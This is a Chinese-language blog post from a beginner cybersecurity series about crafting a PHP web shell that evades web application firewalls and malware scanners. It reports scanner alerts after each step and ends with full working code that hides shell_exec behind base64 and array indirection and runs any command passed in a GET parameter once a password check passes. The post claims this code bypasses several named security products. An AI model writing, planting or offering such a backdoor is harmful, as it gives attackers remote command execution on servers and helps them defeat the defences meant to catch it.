从0到1学习网络安全 【实战篇 - 制作一匹过狗马】
2019-03-28 本文已影响21人
_07
研究了下过狗php小马,分享一下制作的过程
注:今后继续定期更新---“实战”!
Step1:制作了一个执行命令的小马,用查杀工具扫描一下发现河马竟然没告警...
原因可能是,我用变量代替了shell_exec 字符。
3.php安全狗,D盾告警分别如下:
安全狗告警.pngD盾告警.png
Step2:在原有代码上添加方法把执行命令那段代码括起来,安全狗绕过。
2.phpD盾依然告警(内藏可疑变量函数):
D盾告警.pngStep3:再加一个变量,D盾依然告警但是威胁等级降低了!不过好像加这个变量确实没啥用。
1.phpD盾告警如下(变量函数):
D盾告警.pngStep4:既然变量代替shell_exec会告警,我换成数组试试:
0.php绕过成功,根据查杀软件给出的提示想出对应的绕过方式,过狗就很简单了。
查杀软件告警.php最终代码:
<?php
//pwd=iChina
//测试结果通杀以下软件:360企业专业版、安全狗、河马、D盾、ESET
function payload($cmd,$pwd,$func)
{
//执行命令
if ($pwd=='c256b667c0bfd5b0cd0f0e77976a37e7') {
$array = array($func,"iChina","https://www.bug1024.cn");
$result = $array[0]($cmd);
echo $result;
} else {
echo 'Password is wrong!';
}
}
if (isset($_GET['cmd'])&&isset($_GET['pwd'])) {
$cmd = $_GET['cmd'];
$pwd = md5($_GET['pwd']);
$func = base64_decode('c2hlbGxfZXhlYw==');
payload($cmd,$pwd,$func);
} else {
echo 'Please input password!';
}
?>
第一次写过狗马,大佬勿喷
由于小编也在学习中,写的不好请见谅。
从0到1学习网络安全 【目录】实战环境地址群内公布!!!
白帽交流群 【简介】
感谢大家支持。